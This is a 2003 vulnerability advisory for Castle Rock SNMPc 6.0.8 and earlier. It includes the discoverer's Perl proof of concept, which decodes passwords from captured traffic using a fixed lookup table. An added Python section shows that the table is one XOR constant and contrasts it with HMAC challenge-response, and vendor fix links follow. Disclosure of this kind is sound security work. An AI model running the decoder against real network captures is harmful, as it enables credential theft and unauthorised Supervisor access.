Reported August 27, 2003 by Alexander V. Nickolenko.

VERSIONS AFFECTED

Castle Rock SNMPc 6.0.8 and earlier

DESCRIPTION

A vulnerability in Castle Rock SNMPc 6.0.8 and earlier can let any remote user gain Supervisor access to the vulnerable system. This vulnerability is a result of a weak authentication protocol.

DEMONSTRATION

The discoverer posted the following code as proof of concept:

#!/usr/bin/perl

$str='.YZ[\\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz{|}~.pqrstuvwhijklmno`abcdefg................................89:;<=>?01234567()*+,-./ !"#$%&\'................................................................................................................................';

while(<>)
{
   $s="";
   if(/^0130 /){
     GETIT: {
       do {
         s/^0130 00 00 // if /^0130/;
         s/^[[:xdigit:]]{4} //;
         s/ .*$//ms;
         $s=$s." ".$_;
         last GETIT if ($s =~ / 00/);
       } while (<>)
     };
     $s=~s/ 00.*$//ms;
     $s=~s/ ([[:xdigit:]]{2}) ([[:xdigit:]]{2})/ substr($str,(hex($1)),1).substr($str,(hex($2)),1) /ige;
     $s=~s/ ([[:xdigit:]]{2})/ chr(hex($1)) /ige;
     print ":$s:\n";
   }
}
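
Added example, not part of the original advisory or the discoverer's code: it checks the lookup table from the proof of concept above and shows it is consistent with one fixed XOR constant, then contrasts that with a generic HMAC challenge-response. The function names, the sample value, the dot-run lengths (assumed 32 and 128) and the HMAC scheme are illustrative assumptions, not the vendor's fix.

```python
import hashlib
import hmac
import os

# TABLE mirrors the $str literal from the proof of concept above; the two runs
# of '.' are assumed to be 32 and 128 characters long (256 entries in total).
TABLE = (
    "." "YZ[\\]^_" "PQRSTUVW" "HIJKLMNO" "@ABCDEFG"
    "xyz{|}~." "pqrstuvw" "hijklmno" "`abcdefg" + "." * 32 +
    "89:;<=>?" "01234567" "()*+,-./" " !\"#$%&'" + "." * 128
)

def xor_constants(table):
    """Return every byte k for which the table is just 'XOR with k'.

    Entry i agrees with k when it holds chr(i ^ k) for printable ASCII and the
    '.' placeholder otherwise. Index 0 is skipped because the PoC treats byte
    00 as the end of the field.
    """
    def expected(i, k):
        c = i ^ k
        return chr(c) if 0x20 <= c <= 0x7E else "."
    return [k for k in range(256)
            if all(table[i] == expected(i, k) for i in range(1, 256))]

def fixed_xor(data, k):
    """Keyless byte-wise XOR: the same call obfuscates and recovers."""
    return bytes(b ^ k for b in data)

def hmac_response(secret, nonce):
    """Challenge-response alternative: only a MAC over a fresh nonce is sent."""
    return hmac.new(secret, nonce, hashlib.sha256).digest()

def verify_response(secret, nonce, response):
    """Server-side check in constant time."""
    return hmac.compare_digest(hmac_response(secret, nonce), response)

if __name__ == "__main__":
    ks = xor_constants(TABLE)
    print("XOR constants consistent with the table:", [hex(k) for k in ks])
    pw = b"Example-Pass1"  # constructed sample value
    print("fixed XOR sends identical bytes on every login:",
          fixed_xor(pw, ks[0]) == fixed_xor(pw, ks[0]))
    n1, n2 = os.urandom(16), os.urandom(16)
    print("HMAC responses differ per nonce:",
          hmac_response(pw, n1) != hmac_response(pw, n2))
```

A table that reduces to one constant carries no secret, so anyone who can observe the exchange can recover or replay the credential; the challenge-response form never puts the secret on the wire.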


VENDOR RESPONSE

Castle Rock has released fixes for versions 6.0.5 (http://www.castlerock.com/download/fix821_605.zip) and 6.0.8 (http://www.castlerock.com/download/fix821_608.zip) and a full version (http://www.castlerock.com/download/snmpc519.exe) fix for release 5.1.

CREDIT

Discovered by Alexander V. Nickolenko.